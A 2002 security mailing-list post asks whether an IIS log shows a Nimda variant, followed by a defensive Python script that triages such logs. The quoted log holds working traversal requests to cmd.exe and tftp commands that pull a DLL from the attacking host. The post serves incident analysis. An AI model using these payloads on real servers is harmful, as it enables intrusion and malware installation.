Security Incidents mailing list archives

Another Nimda attack??
From: "Eugene Chua Yew Gin" <chuayg () 1-net com sg>
Date: Tue, 17 Sep 2002 17:42:37 +0800



Hi, I need some advice on the log below. Can anyone advise whether this is a
pattern of Nimda? I find it rather strange because it downloads cool.dll and
httpodbc.dll instead of Admin.dll. Norton Antivirus reported a W32.Nimda.E@MM
(dr) virus; is it a new variant?

Thanks and regards.

2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /c/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:23 202.100.249.231 - xxxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20
cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:24 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:51 202.100.249.231 - 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500
-
2002-09-16 07:54:53 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:54 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_vti_bin/..%5c../..%5c../..%5c../httpodbc.dll - 500 -
2002-09-16 07:54:55 202.100.249.231 - 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir
403 -
2002-09-16 07:54:57 202.100.249.231 - 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/winnt/system32/cmd.exe
/c+dir 404 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 -

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
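
A triage sketch for a log like the one in this post, added here as an example and not part of the original message: it separates the shell requests that returned 200, the tftp fetches (source host, remote file, local path) and the later requests for the fetched file. The function names `parse` and `triage` are hypothetical, and the sample lines are constructed by re-joining wrapped entries from the post onto single lines.

```python
import re
from urllib.parse import unquote

# Constructed sample: entries from the log above, re-joined onto single lines.
SAMPLE = r"""
2002-09-16 07:53:21 202.100.249.231 - xxxx 80 GET /scripts/root.exe /c+dir 404 -
2002-09-16 07:53:25 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2002-09-16 07:53:56 202.100.249.231 - xxxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20202.100.249.231%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2002-09-16 07:54:53 202.100.249.231 - 80 GET /scripts/..%5c../httpodbc.dll - 500 -
2002-09-16 07:54:58 202.100.249.231 - 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
""".strip().splitlines()

# Matches the decoded download command seen in the query column.
TFTP = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)\s+(\S+)", re.I)

def parse(line):
    """Split one log entry; the server-name column is optional in this log."""
    f = line.split()
    i = f.index("GET")
    return {"ts": f"{f[0]} {f[1]}", "src": f[2], "path": unquote(f[i + 1]),
            "query": unquote(f[i + 2].replace("+", " ")), "status": int(f[-2])}

def triage(lines):
    """Label each request and collect what needs follow-up on the host."""
    report = {"shell_ok": [], "downloads": [], "dll_requests": []}
    dropped = set()  # file names the tftp commands tried to write locally
    for e in map(parse, lines):
        shell = e["path"].lower().endswith(("cmd.exe", "root.exe"))
        m = TFTP.search(e["query"])
        if shell and m:
            host, remote, local = m.groups()
            dropped.add(local.split("\\")[-1].lower())
            report["downloads"].append((e["ts"], host, remote, local, e["status"]))
        elif shell and e["status"] == 200:
            report["shell_ok"].append((e["ts"], e["path"]))
        elif e["path"].split("/")[-1].lower() in dropped:
            report["dll_requests"].append((e["ts"], e["path"], e["status"]))
    return report

if __name__ == "__main__":
    for kind, rows in triage(SAMPLE).items():
        print(kind, *rows, sep="\n  ")
```

The `shell_ok` rows are the requests where the server answered 200 to a `cmd.exe` call, and the local paths in `downloads` are the files to look for on disk.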
